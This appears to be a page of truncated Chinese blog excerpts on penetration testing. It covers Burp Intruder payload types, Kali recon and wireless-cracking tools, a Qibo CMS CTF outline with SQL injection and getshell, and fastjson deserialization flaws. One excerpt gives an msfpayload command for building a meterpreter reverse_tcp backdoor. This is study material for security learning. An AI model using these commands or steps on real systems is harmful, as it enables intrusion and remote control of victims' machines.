之前章节记到Burp Intruder功能区,接上次笔记 一.首先说再展开说说Brup Intruder功能, 1.标识符枚举Web应用程序经常使用标识符来引用用户账户,资产数据信息. 2.提取有用的数据,不是简单的识别有效标识符,而是通过简单标识符提取其他数据,比方说,通过用户个人空间的ID获取用户关联信息. 3.模糊测试很多输入性的漏洞,譬如说常见的SQL注入,跨站脚本和文件路径便利可以通过请求参数提交各种测试字符串,并分析错误信息和其他异常情况,并对应用程序进行检测,但是手动执行这样的测试…

接上次笔记这章记payload的类型分类做一说明: 1.simplelist是一个简单的payload类型,通过配置一个字符串作为payload,也可以手动添加字符串列表. 2.运行文件 Runtime file ----指定文件,作为对应的payload位置上的payload列表,下方的payload options将自动添加改变为文件选择按钮和输入框,指定后BurpIntruder 将读取文件的每一行作为一个payload 3.自定义迭代器(Custom iterator)一共有八个占位,每…

续上次笔记 1.之前记到payload类型的用户名生成器,(username  generator).这种类型发payload只要用于用户名和email账号的自动生成. 2.ECB加密块洗牌(ECB block shufffler)这种类型的payload是基于ECB加密模式的payload生成器,ECB加密模式中每组64位的数据之间相互独立,通过改变分组数据的位置方式来验证应用程序是否受到攻击. 3.Burp payload生成插件(Extension -generated)这种类型的payl…

继续接上次笔记: 1.Burp Intruder的payload类型的子模块(Character blocks)使用一种给出的输入字符,根据指定的设置产生指定大小的字符块,表现形式为生成指定长度的字符串,通常使用了边界测试或者缓冲区溢出. Base string是指设置原始字符串,Min Length是指payload的最小长度,Max length是指payload的最大长度, Setp☞生成payload时的步长,如下图就是配置之后产生的payload 2.数字类型(number)-----…

x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…

声明:本文理论大部分是苑房弘kalilinux渗透测试的内容 第五章:基本工具 克隆网页,把gitbook的书记下载到本地 httrack "http://www.mybatis.org/mybatis-3/zh/" -O ./books/mybatis/ -v 第六章: 信息收集 shodan 官网:https://www.shodan.io/ 视频教程:https://asciinema.org/~Shodan 优质文档:http://b404.xyz/2018/02/08/Sho…

信息收集: dns信息收集 格式:dns... -参数 域名 -参数 示例: root@xxSec:~# dnsenum baidu.com root@xxSec:~# dnsenum -f dns.txt dnsserver 8.8.8.8 baidu.com(-f加字典暴力破解 通过代理服务器) root@xxSec:~# dnswalk baidu.com.(检测有问题的dns,域名后面要加.结束) root@xxSec:~# dnstracer -s 8.8.8.8 baidu.com…

声明:本文理论大部分是苑房弘kalilinux渗透测试的内容 第五章:基本工具 克隆网页,把gitbook的书记下载到本地 httrack "http://www.mybatis.org/mybatis-3/zh/" -O ./books/mybatis/  -v 十一章:无线渗透 工具: 无线网卡: 其实我的笔记本自带的无线网卡就很好了,完全支持aircrack-ng,因为我是 物理机直接装的kali. 之前尝试过ALFA360NH,信号大大的增强了,但是不支持WPS 破解,可能是我…

网站是齐博CMS V7.0    1.要求获得管理员密码:   利用齐博CMS V7.0  SQL爆破注入漏洞即可得到管理员用户名密码    https://www.cnblogs.com/vspiders/p/7399088.html   2.要求获得服务器管理员桌面的flag:   利用齐博CMS V7.0 后台getshell   https://www.uedbox.com/post/41188/      3.bbs.test.ichunqiu数据库中admin的salt值   第 3…

本文原创地址:https://www.cnblogs.com/yunmuq/p/14268028.html 一.背景 fastjsion是阿里的开源Java工具:https://github.com/alibaba/fastjson 能快速地将对象序列化为json字符串,或进行反序列化 其速度和效率在同类型工具中遥遥领先,但曾被曝出存在高危漏洞 漏洞主要分布于1.2.68及以下的版本中,在将json反序列化为对象时,存在代码执行漏洞 如果一些项目未更新到最新版本,则存在安全漏洞 二.Payloa…